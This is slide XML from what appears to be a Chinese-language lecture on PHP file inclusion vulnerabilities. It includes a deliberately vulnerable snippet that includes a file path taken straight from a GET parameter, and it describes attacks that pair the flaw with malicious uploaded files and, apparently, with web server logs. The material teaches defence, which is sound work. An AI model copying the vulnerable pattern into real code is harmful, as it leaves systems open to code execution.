                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>get</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1890" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>请求中获取到用户需要访问的功能，并且将对应的功能文件包含进来。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6" name="组合 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{E63DC942-CCC6-4133-9C2E-094D5AA50BA8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1532831" y="736005"/>
            <a:ext cx="3888432" cy="2592288"/>
            <a:chOff x="8859258" y="3090372"/>
            <a:chExt cx="2733577" cy="2398161"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="00B0F0"/>
          </a:solidFill>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="íṡľíḍè-Rectangle 17">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{58C201C8-1378-4DE5-BC0C-CE8294931C5F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8859258" y="3090372"/>
              <a:ext cx="2733577" cy="2398161"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:grp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Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="文本框 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{CD33A36A-1B33-4C34-9689-4B288829BF96}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8925690" y="3207014"/>
              <a:ext cx="2600712" cy="1724415"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:grpFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
              <a:scene3d>
                <a:camera prst="orthographicFront"/>
                <a:lightRig rig="threePt" dir="t"/>
              </a:scene3d>
              <a:sp3d contourW="12700"/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr fontAlgn="auto">
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="微软雅黑"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>重复</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="微软雅黑"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>使用的版块</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="微软雅黑"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>。如页面的页头、页脚以及菜单文件。通过文件包含对这些文件进行引入，在某个地方需要修改时，开发人员只需要对单个文件进行更新即可，而不需要修改使用这些板块的其他文件。</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9" name="组合 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{E63DC942-CCC6-4133-9C2E-094D5AA50BA8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5781303" y="719357"/>
            <a:ext cx="5760640" cy="2608936"/>
            <a:chOff x="8859258" y="3090372"/>
            <a:chExt cx="2733577" cy="2398161"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="00B050"/>
          </a:solidFill>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="íṡľíḍè-Rectangle 17">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{58C201C8-1378-4DE5-BC0C-CE8294931C5F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8859258" y="3090372"/>
              <a:ext cx="2733577" cy="2398161"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:grp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Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{CD33A36A-1B33-4C34-9689-4B288829BF96}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8925690" y="3207014"/>
              <a:ext cx="2600712" cy="1558887"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:grpFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
              <a:scene3d>
                <a:camera prst="orthographicFront"/>
                <a:lightRig rig="threePt" dir="t"/>
              </a:scene3d>
              <a:sp3d contourW="12700"/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr fontAlgn="auto">
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="微软雅黑"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>具有</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="微软雅黑"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>相同框架的不同功能。</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="微软雅黑"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>开发人员可以在不同的页面引入页头、页脚，也可以在定义好页头、页脚的框架中引入不同的功能。这样有新的业务需求时，开发人员只需要开发对应的功能文件，再通过文件包含引入；在有业务需要更替时，开发人员也只需要删除对应的功能文件即可。</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2" name="表格 1"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2355739617"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1892871" y="4510074"/>
          <a:ext cx="9361040" cy="2133600"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" firstCol="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="9361040"/>
              </a:tblGrid>
              <a:tr h="1872208">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="just">
                        <a:lnSpc>
                          <a:spcPct val="125000"/>
                        </a:lnSpc>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>&lt;?</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>php</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" sz="2800" kern="100" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:lnSpc>
                          <a:spcPct val="125000"/>
                        </a:lnSpc>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>$file = $_GET[‘</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>func</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>’];</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" sz="2800" kern="100" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:lnSpc>
                          <a:spcPct val="125000"/>
                        </a:lnSpc>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>include “$file”;</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" sz="2800" kern="100" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:lnSpc>
                          <a:spcPct val="125000"/>
                        </a:lnSpc>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>?&gt;</a:t>
                      </a:r>
                      <a:endParaRPr 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tx1"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2166705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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="9"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="9"/>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linds(horizontal)">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1100783" y="1453648"/>
            <a:ext cx="10657184" cy="2237745"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="86376" tIns="43188" rIns="86376" bIns="43188" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>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如果被包含文件的文件名是从用户处获得的，且没有经过恰当的检测，从而包含了预想之外的文件，导致了文件泄露甚至是恶意代码注入，这就是文件包含漏洞</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。如果被包含的文件储存在服务器上，那么对于应用来说，被包含的文件就在本地，就称之为本地文件包含漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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 name="组合 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{05F161E4-DC58-4EEF-AEC9-22161DFC6C75}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="596727" y="864499"/>
            <a:ext cx="4032448" cy="878191"/>
            <a:chOff x="596727" y="864499"/>
            <a:chExt cx="2596493" cy="878191"/>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596727" y="864499"/>
              <a:ext cx="2596493" cy="878191"/>
              <a:chOff x="1420106" y="1392013"/>
              <a:chExt cx="2596493" cy="87819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2646215" y="750719"/>
                <a:ext cx="498142" cy="1802169"/>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048299" y="1392013"/>
                <a:ext cx="1968300" cy="878191"/>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本地文件包含漏洞</a:t>
                </a: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24" name="security-shield_74740">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{D14D2C8D-B2F9-4800-9BB6-309CE3E6B96F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeAspect="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="738317" y="945762"/>
              <a:ext cx="346068" cy="367768"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 4091 w 4360"/>
                <a:gd name="T1" fmla="*/ 725 h 4640"/>
                <a:gd name="T2" fmla="*/ 2180 w 4360"/>
                <a:gd name="T3" fmla="*/ 0 h 4640"/>
                <a:gd name="T4" fmla="*/ 269 w 4360"/>
                <a:gd name="T5" fmla="*/ 725 h 4640"/>
                <a:gd name="T6" fmla="*/ 2180 w 4360"/>
                <a:gd name="T7" fmla="*/ 4640 h 4640"/>
                <a:gd name="T8" fmla="*/ 4091 w 4360"/>
                <a:gd name="T9" fmla="*/ 725 h 4640"/>
                <a:gd name="T10" fmla="*/ 698 w 4360"/>
                <a:gd name="T11" fmla="*/ 1138 h 4640"/>
                <a:gd name="T12" fmla="*/ 1962 w 4360"/>
                <a:gd name="T13" fmla="*/ 721 h 4640"/>
                <a:gd name="T14" fmla="*/ 1962 w 4360"/>
                <a:gd name="T15" fmla="*/ 2175 h 4640"/>
                <a:gd name="T16" fmla="*/ 720 w 4360"/>
                <a:gd name="T17" fmla="*/ 2175 h 4640"/>
                <a:gd name="T18" fmla="*/ 698 w 4360"/>
                <a:gd name="T19" fmla="*/ 1138 h 4640"/>
                <a:gd name="T20" fmla="*/ 3012 w 4360"/>
                <a:gd name="T21" fmla="*/ 3664 h 4640"/>
                <a:gd name="T22" fmla="*/ 2397 w 4360"/>
                <a:gd name="T23" fmla="*/ 4081 h 4640"/>
                <a:gd name="T24" fmla="*/ 2397 w 4360"/>
                <a:gd name="T25" fmla="*/ 2610 h 4640"/>
                <a:gd name="T26" fmla="*/ 3574 w 4360"/>
                <a:gd name="T27" fmla="*/ 2610 h 4640"/>
                <a:gd name="T28" fmla="*/ 3478 w 4360"/>
                <a:gd name="T29" fmla="*/ 2941 h 4640"/>
                <a:gd name="T30" fmla="*/ 3012 w 4360"/>
                <a:gd name="T31" fmla="*/ 3664 h 4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60" h="4640">
                  <a:moveTo>
                    <a:pt x="4091" y="725"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="3299" y="725"/>
                    <a:pt x="2693" y="499"/>
                    <a:pt x="2180" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1667" y="499"/>
                    <a:pt x="1060" y="725"/>
                    <a:pt x="269" y="725"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="269" y="2024"/>
                    <a:pt x="0" y="3884"/>
                    <a:pt x="2180" y="4640"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4360" y="3884"/>
                    <a:pt x="4091" y="2024"/>
                    <a:pt x="4091" y="725"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="698" y="1138"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1175" y="1089"/>
                    <a:pt x="1590" y="952"/>
                    <a:pt x="1962" y="721"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1962" y="2175"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="720" y="2175"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="686" y="1827"/>
                    <a:pt x="692" y="1471"/>
                    <a:pt x="698" y="1138"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="3012" y="3664"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2846" y="3825"/>
                    <a:pt x="2640" y="3964"/>
                    <a:pt x="2397" y="4081"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2397" y="2610"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3574" y="2610"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3548" y="2724"/>
                    <a:pt x="3517" y="2835"/>
                    <a:pt x="3478" y="2941"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3372" y="3227"/>
                    <a:pt x="3220" y="3463"/>
                    <a:pt x="3012" y="3664"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9" name="组合 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{6B7466DC-3F76-423F-B82E-113424A8F833}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1085349" y="3832349"/>
            <a:ext cx="10672618" cy="2808312"/>
            <a:chOff x="2324919" y="2752228"/>
            <a:chExt cx="3366406" cy="3429636"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="7" name="组合 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{55C6940C-20D3-4DB5-8A37-C627121ED848}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2324919" y="2752228"/>
              <a:ext cx="3366406" cy="3429636"/>
              <a:chOff x="2324919" y="2752228"/>
              <a:chExt cx="3366406" cy="3429636"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="27" name="矩形 26">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{3CC74326-F99E-481C-8211-98CB5E7E3392}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2324919" y="2752228"/>
                <a:ext cx="3240360" cy="3099931"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="0050A3"/>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xmlns="" id="{6D058FB5-1BE4-4C4E-A317-52F04D235217}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2400010" y="2984478"/>
                <a:ext cx="3291315" cy="3197386"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg1"/>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cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{8445913E-1A53-40D8-8186-531DFF4E0FDC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2540943" y="2986251"/>
              <a:ext cx="3059530" cy="2819028"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"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场景一</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0" smtClean="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：包含</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"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上传的合法</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0" smtClean="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文件</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0" smtClean="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endParaRPr>
            </a:p>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通常应用中都会有文件上传的功能，比如用户头像上传、附件上传等。通过文件上传，攻击者将能携带有恶意代码的合法文件上传到服务器中，由于在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include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等语句中，无论被包含文件的后缀名是什么，只要其中有</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PHP</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的代码，都会将其执行。结合文件包含漏洞，可以将上传的恶意文件引入，使其中的恶意代码得到执行。</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4008071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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{DF16C0EE-F047-4513-ABE9-3621ABC453F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1172791" y="1217589"/>
            <a:ext cx="10297144" cy="1246608"/>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altLang="zh-CN" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>服务器往往会将用户的请求记录在一个日志文件中，以供系统管理员审查。在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>Ubuntu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>系统下，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>apache</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
